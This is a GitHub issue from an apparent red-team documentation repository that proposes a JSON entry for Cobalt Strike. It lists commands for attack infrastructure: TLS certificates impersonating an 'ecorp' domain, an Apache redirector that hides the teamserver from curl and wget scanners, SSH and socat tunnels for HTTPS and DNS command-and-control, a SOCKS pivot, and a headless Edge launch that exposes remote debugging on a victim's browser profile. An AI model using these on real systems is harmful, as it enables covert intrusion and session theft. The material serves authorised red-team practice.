search

Patrick-DE / RTT-Docs

Public repository for the techniques and tools shown on rtt.secdu.de
GNU Affero General Public License v3.0
1 stars 0 forks source link

New tool: Cobalt Strike #127

Open Patrick-DE opened 5 months ago

Patrick-DE commented 5 months ago 
{
  "name": "Cobalt Strike",
  "phases": [
    "00. Infrastructure"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows",
    "Linux"
  ],
  "source": "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm",
  "description": "Cobalt Strike is a platform for adversary simulations and red team operations. The product is designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors.",
  "undetected": [],
  "detected": [],
  "commands": [
    {
      "id": "1911bd14-d626-4e98-9938-15398478f49f",
      "name": "Add certificate to server",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "#Generating a RSA private key\nopenssl req -x509 -nodes -newkey rsa:2048 -keyout localhost.key -out localhost.crt -sha256 -days 365 -subj '/CN=localhost'\n#combine the separate public and private files into a single PFX file\nopenssl pkcs12 -inkey localhost.key -in localhost.crt -export -out localhost.pfx\n#PFX file to a Java KeyStore\nkeytool -importkeystore -srckeystore localhost.pfx -srcstoretype pkcs12 -destkeystore localhost.store\n#upload to CS directory\nscp localhost.store attacker@10.10.10.10:/home/attacker/cobaltstrike/\n#add to the malleable profile\nhttps-certificate {\n     set keystore \"localhost.store\";\n     set password \"passsword\";\n}"
    },
    {
      "id": "f6feb24b-9f33-4ff8-8332-41c624e63bb1",
      "name": "Setup redirector",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "sudo apt install apache2\nsudo a2enmod ssl rewrite proxy proxy_http\nsudo cd /etc/apache2/sites-enabled\nsudo rm 000-default.conf\nsudo ln -s ../sites-available/default-ssl.conf .\nsudo systemctl restart apache2"
    },
    {
      "id": "cb900e82-c79e-4b35-b015-a222a5e1a159",
      "name": "Generate SSL certificate",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "openssl genrsa -out ecorp.key 2048\nopenssl req -new -key ecorp.key -out ecorp.csr\n#identify the path to your CA in this example /home/attacker/ca/\n#create ecorp.ext\nauthorityKeyIdentifier=keyid,issuer\nbasicConstraints=CA:FALSE\nkeyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment\nsubjectAltName = @alt_names\n\n[alt_names]\nDNS.1 = ecorp.com\nDNS.2 = www.ecorp.com\n#generate cert\nopenssl x509 -req -in ecorp.csr -CA ca/ca.crt -CAkey ca/ca.key -CAcreateserial -out ecorp.crt -days 365 -sha256 -extfile ca/ecorp.ext\n#view cert\nopenssl x509 -noout -text -in ecorp.crt\n#upload cert\nscp ecorp.key attacker@10.10.0.100:/home/attacker/private.key\nscp ecorp.crt attacker@10.10.0.100:/home/attacker/public.crt\nsudo cp private.key /etc/ssl/private/\nsudo cp public.crt /etc/ssl/certs/\n#change apache2 config\nsudo nano /etc/apache2/sites-enabled/default-ssl.conf\n+SSLCertificateKeyFile  /etc/ssl/private/private.key\n+SSLCertificateFile     /etc/ssl/private/public.crt\nsudo systemctl restart apache2"
    },
    {
      "id": "5188e899-ecc7-40ff-adf7-22c481818012",
      "name": "Connect redirector with teamserver",
      "description": "-N no shell.\n-R is remote-port:host:host-port.  Bind port 8443 on the redirector and any traffic via that port will be redirected to 127.0.0.1:443 on the team server.",
      "tag": "",
      "results": [],
      "cmd": "#reverse proxy\nssh -N -R 8443:localhost:443 redirector@10.10.10.10\n#add certificate to redirector\nscp localhost.crt redirector@10.10.10.10:/home/attacker/\nsudo cp localhost.crt /usr/local/share/ca-certificates/\nsudo update-ca-certificates\n#add apache2 config \nsudo nano /etc/apache2/sites-enabled/default-ssl.conf\n--\n<Directory /var/www/html/>\n    Options Indexes FollowSymLinks MultiViews\n    AllowOverride All\n    Require all granted\n</Directory>\nSSLProxyEngine on\n--\n#add 404 page\necho \"404\" | sudo tee /var/www/html/404\n#add redirect with user_agent (curl or wget => block) + cookie (requires SESSIONID) check\nsudo nano /var/www/html/.htaccess\n--\nRewriteEngine on\n\nRewriteCond %{HTTP_USER_AGENT} curl|wget [NC]\nRewriteRule ^a$ 404 [PT]\n\nRewriteCond /var/www/html/%{REQUEST_URI} -f\nRewriteRule ^.*$ %{REQUEST_FILENAME} [L]\n\nRewriteCond %{HTTP_COOKIE} SESSIONID\nRewriteRule ^.*$ https://localhost:8443%{REQUEST_URI} [P]\n--"
    },
    {
      "id": "9c6d8fec-47c0-4c90-81c7-80dd680ae17a",
      "name": "DNS redirector",
      "description": "SSH into redirector-2 and set up a port forward between ports 5353 on both the redirector and team server",
      "tag": "",
      "results": [],
      "cmd": "Name\tType\tData\nns1\t    A\t    10.10.0.200\ndns\t    NS\t    ns1.ecorp.com.\n\nssh attacker@10.10.0.200 -R 5353:localhost:5353\n#use socat to listen on UDP 53 on redirector-2 and forward the traffic to TCP 5353\nsudo socat udp4-listen:53,reuseaddr,fork tcp:localhost:5353\n#use socat to listen on TCP 5353 and forward the traffic to UDP 53\nsudo socat tcp-listen:5353,reuseaddr,fork udp4-sendto:localhost:53"
    },
    {
      "id": "78f5ce18-ca91-4c7c-ad1a-1785ca974333",
      "name": "Setup SOCKS",
      "description": "",
      "tag": "",
      "results": [
        "PROTO:SOCKS"
      ],
      "cmd": "socks 9999 socks5"
    },
    {
      "id": "7445ce18-ca91-4c7c-ad1a-1785ca974333",
      "name": "Spawn Google Chrome in debug mode",
      "description": "",
      "tag": "",
      "requirements:{
        "tag": "TOOL:CHROMIUM"
       },
      "results": [
        "EXECUTION:REMOTE"
      ],
      "cmd": "execute 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe' --remote-debugging-port=9222 --remote-debugging-address=0.0.0.0 --user-data-dir=%appdata%\Microsoft\Edge --headless --ignore-certificate-errors about:blank"
    }
  ],
  "content": "",
  "references": []
}